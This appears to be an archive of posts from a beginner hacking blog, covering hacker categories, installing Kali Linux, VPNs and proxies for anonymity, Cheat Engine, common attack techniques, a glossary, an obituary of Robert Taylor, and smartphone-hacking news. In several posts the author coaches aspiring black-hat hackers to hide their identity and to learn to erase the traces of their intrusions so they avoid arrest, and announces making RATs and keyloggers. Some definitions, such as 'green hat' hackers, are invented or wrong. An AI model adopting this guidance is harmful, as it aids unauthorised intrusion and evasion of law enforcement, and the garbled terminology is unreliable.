Hacking Master Tips & Tricks

This blog is created to spread info about cyber security attacks and tips and tricks to avoid cyber attacks. This is for beginners. Every thing about cyber security. Become an cyber security guy by following our tips and tricks.

What is Cybercrime.?

Cybercrime is the use of computers and networks to perform illegal activities such as spreading computer viruses, online bullying, performing unauthorized electronic fund transfers etc.  Most cybercrimes are committed through the internet. Some cybercrimes can also be carried out using mobile phones via SMS and online chatting applications.
Type of Cybercrime
The following list presents the common types of cybercrimes:
Computer fraud:
Intentional deception for personal gain via the use of computer systems.
Privacy violation:
Exposing personal information such as email addresses, phone number, account details etc. on social media, websites etc.
Identity Theft:
Stealing personal information from somebody and impersonating that person.
Sharing copyrighted files/information:
This involves distributing copyright protected files such as eBooks and computer programs etc.
Electronic funds transfer:
This involves gaining an un-authorized access to bank computer networks and making illegal fund transfers.
Electronic money laundering:
This involves the use of computer to launder money.
ATM Fraud:
This involves intercepting ATM card details such as account number and PIN numbers. These details are then used to withdraw funds from the intercepted accounts.
Denial of Service Attacks:
This involves the use of computers in multiple locations to attack servers with a view of shutting them down.
Spam:
Sending unauthorized emails. These emails usually contain advertisements.

What is Hacking

Hacking

In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. The term "hacking" historically referred to constructive, clever technical work that was not necessarily related to computer systems. Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and other networks.
Origins of Hacking
M.I.T. engineers in the 1950s and 1960s first popularized the term and concept of hacking. Starting at the model train club and later in the mainframe computer rooms, the so-called "hacks" perpetrated by these hackers were intended to be harmless technical experiments and fun learning activities.
Later, outside of M.I.T., others began applying the term to less honorable pursuits. Before the Internet became popular, for example, several hackers in the U.S. experimented with methods to modify telephones for making free long-distance calls over the phone network illegally.
As computer networking and the Internet exploded in popularity, data networks became by far the most common target of hackers and hacking.
Well-Known Hackers
Some of the world's most famous hackers began their exploits at a very young age. Some were convicted of major crimes and served time for their offenses. To their credit, some of them also rehabilitated and turned their skills into productive careers.
Hacking vs. Cracking
Malicious attacks on computer networks are officially known as cracking, while hacking truly applies only to activities having good intentions. Most non-technical people fail to make this distinction, however. Outside of academia, its extremely common to see the term "hack" misused and be applied to cracks as well.

Types of hackers

Types of hackers

Now a days a lot of people want to be hackers. It is a good thing to have some extra stuffs in our knowledge bank. So lets start with the basics of hacking, by understanding the different types of hackers. There are mainly 3 types of hackers:

Black Hat Hackers
This category of hackers is also known as "crackers" . Hackers in this category are always tempted to gain privileges of someone(s) system without the authorization or permission. Usually these people works individually for their own gains/ fun. But as a team they can be deadly and their impact can cause trouble to a greater extent. Their activity mainly includes D-DOS attacks to websites, Site Defacing, Identity Theft, Vandalism etc. You will be lectured in detail about these terms in the following tutorials.

White Hat Hackers

In contradiction to Black hat hackers, White hat hackers are life-saving angels to many. They are also designated as "Ethical Hackers". In fact, Ethical Hacking is a career in today's word for many. To be an approved WHH, you need to be certified. But who cares about a certification, when we know what we are talking about and when we have a good and helping mind. To be more specific about their do's, they perform security tests on different systems with the authority's authorization which would be definitely illegal when the hands of a BHH gets involved. When compared to BHH, WHH are small in count, but they are still powerful.
Grey Hat Hackers 

As you can probably imagine, these are those categories of hackers who hacks for both good and bad. They usually do Black hatting for their malicious intentions and do White hatting with good intentions. In short, they help and harm. The majority of the people fall in this category. So they are typical hackers and still a potential threat!

Which One Should I Become?

If you are asking me, it will be a definite WHH. But you don't have to listen to me. What I want to tell you is, it will be always better to know what you are getting into. Hackers are sometimes getting caught, and when they are caught, they will be charges and sometimes may sent to jail for some short period of time if you are not a certified WHH. If you are asking me, I suggest you to keep learning until you gain some good knowledge in the matter and know how to remove all the traces of your hack. There can be different potential traces (like logs of the system you have hacked, your information's that got captured by the hacked system etc) that can lead an expert to pin point the hand cuffs to your hands. The different methods to remove the traces of the hacks will b lectured in the following tutorials.

Other types of Hackers

"Dude just wait a sec! I thought you were saying there are only 3 types of hackers in the world !"

Well and of-course, there are only 3 types of hackers. But there are some different subcategories for these types. Just like some Ranks by which we can categorize.

Elite Hacker - A grade rank meant to describe the most skilled/ reputed hackers. They knew/ discover the hacking methods that are still unknown and that are not been fixed.

Script Kiddie - A lower rank than the above one that designates someone that uses tools made by others to do some stuff and they don't even know a shit about the real hacking.

Neophyte - A much lower rank that describes a person that is a newbie to this matter and is having a little a knowledge about this matter.

Hacktivist - As the name rhymes to "Terrorist", they are the people who hacks to inject some religious, political anarchy.

Green Hat Hackers- As the name indicates, they love green. They hack only for money. They will not think about the cause. They just want the money from their slaves.

Congrats, you've are now one more step closer to your dream! Read at-least one article a day and we will reach there eventually.

,

How to install Kali Linux Operating System in your PC..??

How to install Kali Linux Operating System in your PC..??
Kali Linux
Kali Linux

Intro :-

You're seeing this post probably because you want to install Kali Linux OS in your PC, if you don't you came here just to see what's this thing 'Kali Linux'... So it is a modified of Linux made for hackers... You can for example hack WPA/WPA2 (internet passwords). It's basically the perfect OS for the hackers, the 'Hackers' Paradise'.

Setup :-

- Virtual Machine (VMWare, VirtualBox)
- μTorrent/BitTorrent

Step 1 :-

Install VirtualBox. ATENTION: Install VirtualBox version 4.3.12 because the latest version (4.3.14) is having some problems with some antivirus... So i recommend you to download version 4.3.12.

Step 2 :-

 Search on Google for Kali Linux and click in the first website (official one), select the Downloads tab and download the 'Kali Linux 32 bit ISO' with torrent not direct or it will take forever to download.

Step 3 :-

Now open up VirtualBox and click on 'New' (top left). Name it Kali Linux 1.0.8 (or whatever version you're using) it will automatically choose the type (Linux) and the version just change it to Debian (32 bits).

Step 4 :- 

Hit the 'Next' button and choose the RAM you want to use in this OS I use 1 GB of RAM but i think 500 MB is enough...

Step 5 :- 

Hit 'Next' again. Now choose 'Create a virtual hard drive now' option and click 'Create' choose VMDK option hit 'Next' once again and choose 'Dynamically allocated' and 'Next' again.

Step 6 :-

 Right now choose the size of the compartition that you're going to use to make the Virtual Machine I choosed 30 GB but 20 GB is enough... And at the top you will choose the location of the compartition. Hit 'Create'.

Step 7 :-

    Now that the partition is made you are going to click once in the partition you made and then hit 'Settings' at the top left. Click on System>Processor and check the box 'Enable PAEX/NX'. Now go to storage and in Controller: IDE you will find a little CD saying Empty. Now click at the little CD with an Add symbol and choose 'Choose Disk', now browse the ISO File you just downloaded (the Kali Linux ISO File), once you've done that click Ok.

Step 8 :-

    Go to Network and where it says 'Attached to:' you choose 'Host-only Adapter'.

Step 9 :-

    Now you can exit of the Setting Menu and start the Virtual Machine by clicking in the 'Start' button at the top left. Right now will appear a window where you have to make a choice, with the keyboard go down to the option 'Install' and hit Enter to continue.

Step 10 :-

 It will now ask you for your country, language and the keyboard, just select the right information! Now Kali Linux will load. After that is complete it will ask you for the host name and domain name, it doesn't really matter just choose kalilinux for the hostname and kalilinux01 for the domainname. Now it will ask you for the Root Password type in 'toor' which is root written back, re-type it when it ask you do it. Now just select your Time Zone, after that it will load for a bit and then select the 'Partitioning method' as the 'Guide - use entire disk' now keep hitting Enter to choose the defaults and then just hit 'Finish partitioning and write changes to disk' after that it will ask you 'Write changes to disks?' and you hit 'Yes'. Now it will install the OS so it will take like 20-30 minutes.

Step 11 :-

 Now it will ask you 'Use a network mirror?' and click yes, after that it will ask you for a HTTP Proxy Information and you just leave it empty. Now it will download some files from the network mirror.

Step 12 :-

 After that is done it will ask you 'Install the GRUB boot loader to the master boot record?' and choose 'Yes', then finally it will say 'Installation Complete' hit 'Continue'.

Step 13 :- 

Kali Linux will restart and after that a window will appear with the option 'Other...' click on it and it will ask you for username and password, so the username is 'root' and the password is 'toor'.

Step 14 :- 

Kali Linux is installed but now we will update and upgrade... For that just go to: Applications (top left) >Acessories>Terminal, and a window like cmd will open write on it : apt-get update && apt-get -y upgrade && apt-get -y install dkms | Now be sure you wrote it correctly and then hit Enter. After the installation is complete write poweroff and the Virtual Machine will turn off.

Step 15 :- 

Your Kali Linux is good to go so if you want to turn it on again the username is root and the password is toor.



Step 16 :- 

Enjoy your Kali Linux 

Staying Anonymous

Staying Anonymous

If you are planning to be Black/ Grey/ Green Hat hacker, then you will be really worried about you anonymity. What concerns you most have to be "How to stay Anonymous?" . So here are some methods to stay anonymous. These are only some basic anonymity techniques and the more advanced techniques will be lectured in the following tutorials.
A. VPN
VPN is the acronym of Virtual Private Network. As from a hacker's point of view, here are the facts that justifies its need:
1) Counterfeit the ISP's packet detection measures.
    Maintain your anonymity and boost by keeping your ISP from throttling, inspecting and prioritizing the data sent to and from your system.
2) Keep your IP address anonymous.
    Prevent the places your packets are traversing from identifying your connection information and location.
3) Hide your online activities from third parties.
    As a VPN provides a secure tunnel to make a connection to the outside world, it will keep the third parties away from finding your online activities.
4) And of-course, prevent location identification and Geo targeting.
    Yeah! the title says it all.

To help you start, below are some of the FREE VPN's that are available.
Cyberghost http://cyberghostvpn.com/ --> Good for germany
USA IP http://www.usaip.eu/en/free_vpn.php
Free VPN http://thefreevpn.com/
VPN Tool http://www.vpntool.com/services.php --> good US
SecurityKIS http://www.securitykiss.com/sk/index.php
Hotspot Shield http://anchorfree.com/downloads/hotspot-shield/
ProXPN http://proxpn.com/
Open VPN http://openvpn.net/
Tor VPN https://torvpn.com/information.html
Its Hidden http://itshidden.com/
B. Proxies
Proxies are another less secure alternative for VPN's . Proxies does the same job as VPN's as it hides your IP when you are surfing through the internet. There are different types of proxies ranging from less anonymous to high anonymous proxies. One thing that you have to keep in mind is that the proxies will not last for ever. The available proxy address will change from time to time (which is a best thing for staying anonymous).
Below are some of the Proxy sites that you can use as a starting leveler. 
http://proxify.com/
http://www.hidemyass.com/
http://hidefromyou.com/
http://proxy6.org/
http://www.httpsurf.com/
http://www.safersurfing.net/
http://unblocked.in/
http://www.proxeasy.com/webclient.aspx
http://newipnow.com/

C. Virtual Machines
I suggest you to use a virtual machine while doing your stuffs. It is a best way to test your exploits without the pain of buying a new computer. For White hatters this is a heaven, because using a Virtual machine to test the servers(Remote Administration Tools) without the fear of a breach into your actual working environments. Now a days, the RATS and crypting techniques (will be discussed in RAT and Keyloggers section) became far more advanced in the favor of Black Hat hackers so that they can bye pass the Virtual machine environment and actually do their stuff in the host environments.
Below are some of the Popular VM's that you can use .
VMLite - http://www.vmlite.com/index.php?option=c...Itemid=153
VMWare - https://my.vmware.com/web/vmware/downloads
Virtual Box - https://www.virtualbox.org/wiki/Download

D. Be Easy With Your DOX Info
Another common mistake someone will do is that, he will put his details like nick name, email address, country etc on their slaves for the sake of name, You should do it only if you feel that much confident. As you are reading this now, I am pretty sure that, you take my word for this. Your confidence is what I say "Over Confidence". Don't put any kind of information after you are done. There is a site Fake Name Generator - http://www.fakenamegenerator.com/ which can help you generate some fake profiles. Believe me, you can get random profiles with a lots and lot of information from this site.

E. A Final Word
As I said in the starting of this tutorial, these are only some basic level Anonymity tools whose service you can make use of to stay anonymous. These cannot assure 100% anonymity and if you did something Black Hat stuffs and when you hear a door knock and see some cops outside your door, don't blame me :)

,

An Introduction to cheat Engines

Cheat Engine can help you save some time and cut corners on a few video games. It's a great option if you're into a game but don't want to invest more time in the game than you have to offer. Using the popular Plants vs. Zombies game as an example, you can get cheating and save time while having all the fun it offers. It's important to know all of your available cheats so you can get the most of your games.

Steps

Download Cheat Engine. You can find it athttp://cheatengine.org/downloads.php.

Download the game you want to use Cheat Engine on. This tutorial will use Plants vs. Zombies.

Open both the game and Cheat Engine.

Click on the "open processes" icon in upper left Cheat Engine window.

In the process list, click the "PlantsVsZombies.exe" option. Click on "open."

Select the value you want to change. For instance, when you open a new game of Plants vs. Zombies, you see you have only 25 suns.

Enter the new value in Cheat Engine. For example, enter 25 in the Hex field and click "First Scan." You'll get a lot of data in the table at left marked "Address" and "Value."

See the value change inside the game. For instance, when you pick up another sun in Plants vs. Zombies, your energy will be 100.

,

Top 10 Common Hacking Techniques You Should Know About

Unethical hacking can be called an illegal activity to get unauthorized information by modifying a system’s features and exploiting its loopholes. In this world where most of the things happen online, hacking provides wider opportunities for the hackers to gain unauthorized access to the unclassified information like credit card details, email account details, and other personal information. 

So, it is also important to know some of the hacking techniques that are commonly used to get your personal information in an unauthorized way.

10. Keylogger

Keylogger is a simple software that records the key sequence and strokes of your keyboard into a log file on your machine. These log files might even contain your personal email IDs and passwords.

Keylogger is one of the main reasons why online banking sites give you an option to use their virtual keyboards.

9. Denial of Service (DoS\DDoS)

A Denial of Service attack is a hacking technique to take down a site or server by flooding that site or server with a lot of traffic that the server is unable to process all the requests in the real time and finally crashes down.

For DDoS attacks, hackers often deploy botnets or zombie computers which have got the only work to flood your system with request packets.

8. Waterhole attacks

If you are a big fan of Discovery or National Geographic channels, you could relate easily with the waterhole attacks. To poison a place, in this case, the hacker hits the most accessible physical point of the victim.

For example, if the source of a river is poisoned, it will hit the entire stretch of animals during summer. In the same way, hackers target the most accessed physical location to attack the victim. That point could be a coffee shop, a cafeteria etc.

Once hackers are aware of your timings, they might create a fake Wi-Fi access point and modify your most visited website to redirect them to you to get your personal information.

7. Fake WAP

Even just for fun, a hacker can use software to fake a wireless access point. This WAP connects to the official public place WAP. Once you get connected the fake WAP, a hacker can access your data, just like in the above case.

6. Eavesdropping (Passive Attacks)

Unlike other attacks which are active in nature, using a passive attack, a hacker just monitors the computer systems and networks to gain some unwanted information.

The motive behind eavesdropping is not to harm the system but to get some information without being identified.

5. Phishing

Phishing is a hacking technique using which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link.

Once the victim tries to login or enter some data, the hacker gets that private information of the target victim using the trojan running on the fake site.

4. Virus, Trojan etc.

Virus or trojans are malicious software programs which get installed into the victim’s system and keeps sending the victims data to the hacker.

3. ClickJacking Attacks

ClickJacking is also known by a different name, UI Redress. In this attack, the hacker hides the actual UI where the victim is supposed to click.

In another word, the attacker hijacks the clicks of the victim that aren’t meant for the exact page, but for a page where the hacker wants you to be.

2. Cookie theft

The cookies of a browser keep our personal data such as browsing history, username, and passwords for different sites that we access. Once the hacker gets the access to your cookie, he can even authenticate himself as you on a browser.

1. Bait and switch

Using bait and switch hacking technique, the hacker runs a malicious program which the user believes to be authentic. This way, after installing the malicious program on your computer, the hacker gets unprivileged access to your computer.

,

Protecting Your Self

If you are working in a Linux system, donot work as a root user, especially when trying with new stuffs. Else you may have to compromise your entire system. You can switch to your root user when you know what you are doing. Beware of the fact that, even if you are running the application as a non-root user, the trojan can still works and get the user files/ keylogs etc. So as a general advice, I might say, never download untrusted contents especially from IRC, IM, small sites. torrents, warez etc.

Windows is an entirely different platform. If you are limiting yourself without the administrative privilages in windows, it will be pretty hard to keep on working, while in Linux, working as a non-root user and switching to a root user is pretty easy.

 

As I discussed in my previous tutorials, the Windows is the most targetted Operating System because of its popularity and lack of strong security measures. In windows, you have to install a Antivirus Software as the first step defense. Also, you have to update your antivirus as soon as a new update is availble. Without the proper updation of your antivirus softwares, they are nothing but a resource hungry daemon. So, to stay safe, never download any softwares from untrusted sources.

,

A Guy who helped create the internet, dies at 85

The Internet just lost one of its most prominent innovators.
Robert W Taylor, a computer scientist who was instrumental in creating the Internet as well as the modern personal computer, has died at the age of 85.
Mr. Taylor, who is best known as the mastermind of ARPAnet (precursor of the Internet), had Parkinson's disease and died on Thursday at his home in Woodside, California, his son Kurt Kurt Taylor told US media.
While the creation of the Internet was work of many hands, Mr. Taylor made many contributions. 
As a researcher for the US military's Advanced Research Projects Agency (ARPA) in 1966, Taylor helped pioneer the concept of shared networks, as he was frustrated with constantly switching between 3 terminals to communicate with researchers across the country.
His frustration led the creation of ARPAnet— a single computer network to link each project with the others — and this network then evolved into what we now know as the Internet.
In a legendary 1968 essay, Mr. Taylor correctly predicted ARPAnet would become an efficient and necessary utility for the public in the future: a vast, decentralized grid of interconnected devices that would reshape communication at every level.
"In a few years, men will be able to communicate more effectively through a machine than face to face," Taylor wrote in the 1968 paper.

Besides this, Mr. Taylor also played a key role in the creation of the computerMouse. While working as a project manager for NASA in 1961, he learned of research into the direct interaction between humans and computers being conducted by computer scientist Douglas Engelbart (who died in 2013) at the Stanford Research Institute.
Mr. Taylor directed much funding to Engelbart's research, which led to the invention of the mouse, that became an essential element of both Macintosh and Microsoft Windows-based PCs. 
After almost a decade, Taylor moved on to Xerox's legendary Palo Alto Research Center (PARC) in Northern California, where he oversaw the creation of the Alto, a pioneering personal computer.
The Alto was the first PC designed to support an operating system based on a graphical user interface with icons, windows, and menus instead of typing text commands in computer language — a concept that's copied by the operating systems that would follow.
Taylor's engineering team also helped develop the networking technologyEthernet and a word processing program called Bravo that became the basis for Microsoft Word.
Born in Dallas on 10 February 1932, Mr. Taylor was awarded the National Medal of Technology and Innovation in 1999 for"visionary leadership in the development of modern computing technology, including computer networks, the personal computer, and the graphical user interface."
Mr. Taylor, along with other PARC researchers, was also awarded the National Academy of Engineering's Draper Prize in 2004 for the development of "the first practical networked personal computers."
Mr. Taylor retired in 1996.

Basic Config &Tools

Ok. Now we're going to have some discussions about the basic configs and security checks you should take so that you can be safe in your hacking deeds. Well, the cyber-world is no way dissimilar to the actual world, where lots of crimes are committed everyday, and ofcourse you don't want to be targetted by some dull skids, and also, you may never need cops outside your door if ever you did something dull, out of curiosity. 

What is the "Limit" of your Machine?

First of all, as everything we start, here also we must know what is the "limit" or capacity of your computer. You need to know the basic specifications of your computer like:

The memory size of the RAM and the HDDThe speed of your processorHow extreme your graphics card can go, etc

Now you will be more aware of the limitations of your system as you have completed a background check of your machine. So you know what you CAN do and what you CAN'T do with your box.

 

Essential Softwares you need to Install in your Machine?

 

Guess what? This tutorial is mostly biased to support Windows Operating system because of one and only one reason, its reach to the public and the easness in its usage. Frankly, Windows is the most commonly used Operating System in the word as you all may know. And it is only because of its popularity these hackers/ breachers are attacking mostly windows systems. The velow programs that are discussed will work mainly on windows but some of it will work in Linux/ Mac too.

 

1. Anti-Virus Program

Yes, every one will know about it. No need of an explanation here. This is the first line of defense that every one will take. It is adviable to be used in every system, so as to ensure the security at the cost of performance and resources.

 

2. Virtual Machine

At the word that we are currenlty living in, The Virtual Machines are the inevitable part of the System of a Hacker. Every latest viruses that is being released everyday can easily byepass the antivirus securities. Though the antivirus softwares constantly updates their defintions to include more virus signatures, by that time the viruses would have done their tasks.

 

Here, we are the one who will be making RATS/ Keyloggers and exploits. So the risk of testing these kinds of stuffs will be high as, many times, we may have to compromise the stability of our Operating Systsm and may have to re install them.

 

So basically, what is a virtual machine? Well, it is a virtual computer inside you OS which is being simulated to perform the real computer tasks in reality. As I said, when you are creating exploits and all, sometimes things can go fataly wrong and you may lose all of your valuable data. So as a remedy, we can use a virtual machine to develop and test our stuffs. The virtual machine will create a virtual hard disk and executes all the programs withi it. So the scope of your program's execution environment will be contained within the virtual hard disk inside you virtual machine and you can keep your hot operating system safe and sound.  

 

The main disadvantages of the vitual machines are , they will take a lot of resources to sinulate a virtual computer inside your real one. It can be ignored when we can foresee the benefits that we will be getting.

 

3. Sandboxie

So, now you will be thinking about developing some exploits/ RATS. In that case, your system will be your laboratory. So we must give our lab, its own defences.

Sandboxie is a program that will let you run your suspicious programs inside it. Usually, the execution will be done in some remote memory locations that are isolated from the main execution environment. So when you run the application within it, we can easily terminate it at our need without causing a damage to our  "Lab'.

 

4. COMODO Firewall

As an additional security, you can install a firewall in additional to the host operating systems default firewall. Comodo firewall holds some flexible UI so as to monitor every actions that are being performed through our open ports. So using this, we can monitor our inbound and outboud connections and check if anything suspicious is being happening, when you are idle. 

5. VPN (Virtual Private Network)

This one is almost discussed twice in the beginners tutorials. So you are now having knowledge about what I had to tell here, so I am not repeating it here. :)

,

Hackers Dictionary

Let us start our journey from the basics ! Below are some frequently used words, their brief meaning and acronyms that are commonly used in this world !

ACRONYMS

R.A.T :-> Remote Administration Tool

DrDoS :-> Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.

VPS :-> Virtual Private Server

SE :-> Social Engineering

HTTP :-> Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.

SSH :-> Secure Shell, used to connect to Virtual Private Servers.

FTP :-> File Transfer Protocol. Used for transferring files over an FTP server.

XSS (CSS) :-> Cross Site Scripting

Malware :-> Malicious Software

Skid :-> Script Kid/Script Kiddie

DDoS :-> Distributed Denial of Service

VPN :-> Virtual Private Network

Nix :-> Unix based operating system, usually refered to here when refering to DoS'ing.

SQL :-> Structured Query Language. It usually goes along with a word after it, such as "SQL Injection."

FUD :-> Fully Undetectable

WORDS

FUD :-> Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.

LOIC/HOIC :-> Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.

Trojan :-> A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.

Botnet :-> Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.

SQL Injection :-> An SQL injection is a method often used to hack SQL databases via a website, and gain admin control of the site.

Root :-> Highest permission level on a computer, able to modify anything on the system without restriction.

Warez :-> Software piracy

White Hat :-> A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)

Rootkit (ring3 ring0) :-> A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.

Script Kiddie :-> A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.

IP Grabber :-> A link that grabs someone's IP when they visit it.

DDoS :-> Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.

VPS :-> The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.

Malware :-> Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.

Phreak :-> Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.

Bot :-> A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.

Shell :-> The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter.

ANSI Bomb :-> ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.

DOX :-> Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.

Worm :-> Software designed to spread malware with little to no human interaction.

Deface :-> A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.

Keylogger :-> A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.

Remote Administration Tool :-> It's a general term for a hack that can let someone remotely control your computer with admin access.

Black Hat :-> A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)

 

,

7 Ways Your SmartPhone is Being Hacked

7 Ways Your SmartPhone is Being Hacked

How safe is your smartphone?
Are you a victim of smartphone espionage?
It is a fact that governments, the NSA, private organizations and individuals hack smartphones using malicious backdoors, phone apps, ATM skimming type software and wireless radio wave technology to gain illegal access to the unsuspecting smartphone user.
Hackers can take over your smart phone by sending a text message with a photo or video attached. In 2015, over a billion Android phones were affected by this security flaw known as “Stagefright.” According to arstechnica.com a disparaging Qualcomm security-bug, leaves many phones open to attack. The fix is unavailable for most users, and many will probably never get it. “The flaw, which is most severe in Android versions 4.3 and earlier, allows low-privileged apps to access sensitive data that’s supposed to be off-limits, according to a blog published by security firm, Fire Eye, but instead, the data is available by invoking permissions that are already requested by millions of apps available in Google Play.”Unfortunately even with Apple’s strong encryption standards, even an iPhone user’s privacy is still at serious risk and exposure. According to digitaltrends.com the illegal exposure was possible from a security flaw in Signaling System 7 (SS7), a little-knownglobal networkthat connects all the phone carriers around the world. It’s known as the heart of the phone system. The bad news here is that it affects every phone on a cellular network, whether it’s running iOS, Android, or even Windows. Even if a user turns off location services on their phone, hackers would still be able to see the phone’s location via the network. “The theory is that the SS7 flaw is well known within the government, but it’s a hole that security agencies might not want plugged since it provides access to everyone’s phone.”  
 

According to cracked.com, once your phone has been hacked, your cell phone tilt sensor can “sense” what you are typing on your computer. Your phone’s accelerometer can pick up information such as messages, chats and passwords just based on the distance from the keys to the phone and deduce which letters you type.
      4. Any Smartphone with near field capabilities (NFC) can steal credit card information just by being near them. According to                         Cracked.com, “the program’s  creator, Eddie Lee, demonstrated the hack with his own phone at DefCon 2012, then released his simple           app on the Internet as a flashing ‘Fuck you, fix this!’ sign to credit  card companies.”
“FREE CHARGING” Kiosks may use the same technology as ATM Skimming devicesto steal your private information, and data, or install a program on your phone to steal it later.
       6. Ralf-Philipp Weinmann of the University of Luxembourg discovered that hackers infiltrate  your phone through the airwaves                            themselves, through fake cell phone towers,  completely bypassing your operating system and antivirus software to hack directly              into the radio processor. This fake cell phone tower tricks your phone into thinking you are connected to a network. Much like the       security flaw in SS7.
Unsecure Wifi in restaurants, hotels, and airports allows the hackers to view everything you do while connected. On iPhones, a message will warn the user by saying the server cannot be verified.
There may be a silver lining:
According to John Marinho, vice president of Technology & Cyber Security at CTIA, the wireless association, which represents phone carriers and manufactures. “The U.S. has one of the lowest malware infection rate in the world thanks to the entire wireless ecosystem working together and individually to vigilantly protect consumers.”
But is it really?
Or is this just what they want us to think?
According to PCWorld, Edward Snowden has created an iPhone case meant to kill surveillance efforts by hackers who attempt to find your location. You can’t just turn off your location in settings on an iPhone, hackers have found a way around this. Snowden warned, “The GPS, for instance, will still remain active on some handsets, like the iPhone. In the worst-case scenario, malware could also infect the handset to secretly send radio transmissions, he added.”
Snowden’s iPhone case is designed to protect journalists from governments spying their locations. “Unfortunately, journalists can be betrayed by their own tools,” he added. “That may have happened in 2012, when U.S. reporter Marie Colvin was killed while covering the Syrian civil war.” A lawsuit alleges that the Syrian government assassinated her by tracking Colvin’s satellite phone communications to find her location.
Robert Nazarian, from Digitaltrends.com shared critical information in an article dated April 2016. Nazarian says, “U.S. Rep. Ted Lieu, D-Calif., a member of the House Budget Committee and the House Committee on Oversight and Government Reform, called for a full investigation into the SS7 issue and sent a Letter dated April 18, 2016, to Honorable Jason Chaffetz, Chairman, and Honorable Elijia Cummings, Ranking Member, of the House Committee on Oversight and Government Reform.
In the letter to Chaffets and Cummings, Lieu says:
“ANYONE WHO KNOWS ABOUT THIS FLAW AND DIDN’T ACTIVELY TRY TO REMEDY IT SHOULD BE FIRED. WE CAN’T HAVE 300 SOME MILLION AMERICANS, AND REALLY THE GLOBAL CITIZENRY, BE AT RISK OF HAVING THEIR PHONE CONVERSATIONS INTERCEPTED WITH A KNOWN FLAW SIMPLY BECAUSE SOME INTELLIGENCE AGENCIES MIGHT GET SOME DATA,” HE SAID. THAT IS NOT ACCEPTABLE.”

Of course, Edward Snowden outed himself as the NSA whistleblower, because he thought the current NSA surveillance techniques were a threat to democracy, and many individuals agree with him and are in his corner. It was confirmed that the NSA has DEEP HOOKS in Big Tech, including real time access to the data of American citizens.
George Orwell warned of big government overstepping their boundaries. In his book titledNineteen Eighty Four the term Big Brother is a fictional dictatorship used to refer to any ruler or government that invades the privacy of its citizens.
In 1961, Dwight D. Eisenhower warned “In the councils of government, we must guard against the acquisition of unwarranted influence, whether sought or unsought, by the military industrial complex. The potential for the disastrous rise of misplaced power exists and will persist.”
Sure enough, Big Brother has figured out Big Tech hacking.
Even if we try to stay one step ahead . . .

Hackers Can Steal Your Pasword Just by Monitering SmartPhone Sensors

Hackers Can Steal Your Password Just by Monitoring Smart-Phone  Sensors


Do you know how many kinds of sensors your smartphone has inbuilt? And what data they gather about your physical and digital activities?
An average smartphone these days is packed with a wide array of sensors such as GPS, Camera, microphone, accelerometer, magnetometer, proximity, gyroscope, pedometer, and NFC, to name a few.
Now, according to a team of scientists from Newcastle University in the UK, hackers can potentially guess PINs and passwords – that you enter either on a bank website, app, your lock screen – to a surprising degree of accuracy by monitoring your phone's sensors, like the angle and motion of your phone while you are typing. 
The danger comes due to the way malicious websites and apps access most of a smartphone's internal sensors without requesting any permission to access them – doesn't matter even if you are accessing a secure website over HTTPS to enter your password.
Your Phone doesn't Restrict Apps from Accessing Sensors' Data
Your smartphone apps usually ask your permissions to grant them access to sensors like GPS, camera, and microphone.
But due to the boom in mobile gaming and health and fitness apps over the last few years, the mobile operating systems do not restrict installed apps from accessing data from the plethora of motion sensors like accelerometer, gyroscope, NFC, motion and proximity.
Any malicious app can then use these data for nefarious purposes. The same is also true for malformed websites.
"Most smartphones, tablets and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera, and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer," Dr. Maryam Mehrnezhad, the paper's lead researcher, said describing the research.
"But because mobile apps and websites don't need to ask permission to access most of them, malicious programs can covertly 'listen in' on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords."

Scientists have even demonstrated an attack that can record data from around 25 sensors in a smartphone. They have also provided a video demonstration of their attack, showing how their malicious script is collecting sensor data from an iOS device.
The team wrote a malicious Javascript file with the ability to access these sensors and log their usage data. This malicious script can be embedded in a mobile app or loaded on a website without your knowledge. 
Now all an attacker need is to trick victims into either installing the malicious app or visiting the rogue website.
Once this is done, whatever the victim types on his/her device while the malicious app or website running in the background of his phone, the malicious script will continue to access data from various sensors and record information needed to guess the PIN or passwords and then send it to an attacker's server.
Guessing PINs and Passwords with a High Degree of Accuracy
Researchers were able to guess four-digit PINs on the first try with 74% accuracy and on the fifth try with 100% accuracy based on the data logged from 50 devices by using data collected from just motion and orientation sensors, which do not require any special permission to access.
The scientists were even able to use the collected data to determine where users were tapping and scrolling, what they were typing on a mobile web page and what part of the page they were clicking on.
